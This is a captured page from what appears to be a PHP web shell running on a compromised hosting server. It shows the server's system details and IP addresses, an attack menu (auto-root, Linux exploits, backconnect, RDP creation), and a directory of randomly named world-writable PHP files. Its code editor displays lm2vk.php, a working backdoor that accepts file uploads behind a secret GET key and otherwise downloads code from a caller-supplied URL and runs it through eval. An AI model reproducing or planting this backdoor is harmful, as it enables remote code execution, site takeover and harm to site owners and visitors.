Linux webd132.cluster028.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.28.40.121 | : 3.15.138.33
Cant Read [ /etc/named.conf ]
7.4.33
binzoev
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
binzoev /
penisolasorrentinanews /
zshth /
[ HOME SHELL ]
Name
Size
Permission
Action
languages
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
themes
[ DIR ]
drwxrwxrwx
upgrade
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
.htaccess
943
B
-r--r--r--
29sjy.php
346
B
-rwxrwxrwx
7gay1.php
1.11
KB
-rwxrwxrwx
8vodp.php
1.11
KB
-rwxrwxrwx
cong.php
85.91
KB
-rwxrwxrwx
db-cache.php
7.98
KB
-rwxrwxrwx
f4v58.php
346
B
-rwxrwxrwx
fr.php
13.37
KB
-rwxrwxrwx
index.php
7.98
KB
-rwxrwxrwx
lm2vk.php
1.11
KB
-rwxrwxrwx
login.php
50.14
KB
-rwxrwxrwx
logo.jpg
5.39
KB
-rwxrwxrwx
qsyw7.php
1.11
KB
-rwxrwxrwx
r2olm.php
1.11
KB
-rwxrwxrwx
rnoqu.php
1.11
KB
-rwxrwxrwx
ru9be.php
346
B
-rwxrwxrwx
shell20211028.php
38.32
KB
-rwxrwxrwx
ty.php
178.11
KB
-rwxrwxrwx
ugmoc.php
1.11
KB
-rwxrwxrwx
vg3e5.php
1.11
KB
-rwxrwxrwx
zq5.php
193.1
KB
-rwxrwxrwx
zsh9l.php
346
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lm2vk.php
<?php error_reporting(0); echo php_uname()."<br>".getcwd()."<br>"; if($_GET['FOx'] == 'uNwCi'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } $code = "http://".$_GET["php"]; if (empty($code) or !stristr($code, "http")){ exit; } else { $php=file_get_contents($code); if (empty($php)){ $php = curl($code); } $php=str_replace("<?php", "", $php); $php=str_replace("?>", "", $php); eval($php); } function curl($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_TIMEOUT, 40); curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE); if (stristr($url,"https://")) { curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); } curl_setopt($curl, CURLOPT_HEADER, false); return curl_exec ($curl); } ?>
Close